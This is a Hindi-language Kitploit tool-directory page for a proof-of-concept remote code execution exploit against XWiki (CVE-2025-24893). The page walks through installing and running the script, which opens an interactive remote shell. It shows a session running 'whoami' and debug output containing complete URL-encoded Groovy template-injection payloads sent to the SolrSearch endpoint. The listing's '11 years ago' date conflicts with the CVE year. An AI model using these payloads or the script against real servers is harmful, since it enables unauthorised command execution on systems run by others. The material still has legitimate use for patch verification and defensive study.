Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-24893-RCE-PoC — यह CVE-2025-24893 के लिए rce कमजोरी का एक छोटा स्क्रिप्ट है। यह बुनियादी इनपुट/आउटपुट का समर्थन करता है। | Kitploit
उपकरण/GitHubGitHub/gmh5225/cve-2025-24893-rce-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubgmh5225/cve-2025-24893-rce-poc

CVE-2025-24893-RCE-PoC

यह CVE-2025-24893 के लिए rce कमजोरी का एक छोटा स्क्रिप्ट है। यह बुनियादी इनपुट/आउटपुट का समर्थन करता है।

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

जानकारी

यह PoC पहले SSTI का परीक्षण करता है और यदि यह काम करता है तो। यह लूप में जाएगा और आपको रिमोटली कमांड चलाने की अनुमति देता है।

वर्तमान में exec और shell कमांड एक ही काम करते हैं।

स्थापना

root@kitploit:~
python3 -m pip install requirements.txt

उपयोग

कनेक्ट करना

root@kitploit:~
python3 poc.py <target>

उदाहरण

डिबग को False (डिफ़ॉल्ट) पर सेट करने पर

root@kitploit:~
python3 poc.py http://10.129.137.222:8080
[*] Targeting http://10.129.137.222:8080
[+] Target is vulnerable!
(xwiki-shell) > help

Documented commands (type help <topic>):
========================================
exec  exit  help  shell

(xwiki-shell) > exec whoami
xwiki

डिबग को True पर सेट करने पर

स्क्रिप्ट के शीर्ष पर डिबग फ़्लैग आपको उत्पन्न URL दिखाएगा। यह एक debug.log फ़ाइल बनाएगा जिसमें अनुरोध की कच्ची प्रतिक्रिया होगी।

root@kitploit:~
python3 poc.py http://10.129.137.222:8080
[*] Targeting http://10.129.137.222:8080
[DEBUG] URL used: http://10.129.137.222:8080/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22XWIKI_TEST_123%22%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D
[DEBUG] Response content-type: application/rss+xml;charset=utf-8
[+] Target is vulnerable!
(xwiki-shell) > help

Documented commands (type help <topic>):
========================================
exec  exit  help  shell

(xwiki-shell) > exec whoami
[DEBUG] URL used: http://10.129.137.222:8080/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22whoami%22.execute%28%29.text%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D
[DEBUG] Response content-type: application/rss+xml;charset=utf-8
xwiki
टूल डाउनलोड करें